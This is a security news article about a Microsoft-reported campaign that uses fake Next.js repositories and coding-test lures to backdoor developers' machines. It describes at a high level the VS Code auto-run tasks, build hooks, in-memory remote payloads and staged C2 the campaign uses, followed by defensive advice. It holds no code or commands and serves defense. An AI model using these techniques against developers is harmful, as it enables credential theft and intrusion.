Microsoft says it has uncovered a coordinated campaign targeting software developers through malicious repositories posing as legitimate Next.js projects and technical assessments.

The campaign employs carefully crafted lures to blend into routine workflows, such as cloning repositories, opening projects, and running builds, thereby allowing the malicious code to execute undetected.

Telemetry collected during an incident investigation by Microsoft suggested the campaign’s alignment with a broader cluster of threats using job-themed tricks. “During initial incident analysis, Defender telemetry surfaced a limited set of malicious repositories directly involved in observed compromises,” the company wrote in a security blog post. “Further investigation uncovered additional related repositories that were not directly referenced in observed logs but exhibited the same execution mechanisms, loader logic, and staging infrastructure.”

The campaign exploits developers’ trust in shared code, gaining persistence within high-value developer systems that often contain source code, environment secrets, credentials, and access to build or cloud infrastructure.

Multiple triggers for remote control

Microsoft researchers found that the malicious repositories were engineered with redundancy, offering several execution paths that ultimately result in the same backdoor behavior.

In some cases, simply opening the project in Visual Studio Code was enough. The attackers abused workspace automation by embedding tasks configured to run automatically when a folder is opened and trusted. This causes code execution without the developer running anything.

Other variants rely on build processes or server startup routines, ensuring that the malicious code runs when developers perform typical actions such as launching a development server. Regardless of the trigger, the repositories retrieve additional JavaScripts from remote infrastructure and execute it in memory, reducing traces on disk.

The retrieved payload operates in stages. An initial registration component identifies the host and can deliver bootstrap instructions, after which a separate C2 controller provides persistence and enables follow-on actions such as payload delivery and data exfiltration.

Infection through a fake “coding test”

Microsoft said the investigation started with analyzing the suspicious outbound connections from Node.js processes communicating with attacker-controlled servers. Correlating network activity with process telemetry led analysts back to the original infection through recruiting exercises.

One of the repositories was hosted on Bitbucket and presented as a technical assessment, along with a related repository using the Cryptan-Platform-MVP1 naming convention. “Multiple repositories followed repeatable naming conventions and project ‘family’ patterns, enabling targeted searches for additional related repositories that were not directly referenced in observed telemetry but exhibited the same execution and staging behavior,” Microsoft wrote.

When an infection is suspected, Microsoft warns that affected organizations must immediately contain suspected endpoints, trace the initiating process tree, and hunt for repeated polling to suspicious infrastructure across the fleet. Because credential and session theft may follow, responders should evaluate identity risk, revoke sessions, and restrict high-risk SaaS actions to limit exposure during investigation.

Long-term mitigations include a focus on tightening developer trust boundaries and reducing execution risk, Microsoft added. Other recommendations include enforcing Visual Studio Code Workspace Trust defaults, applying attack surface reduction rules, enabling cloud-based reputation protections, and strengthening conditional access.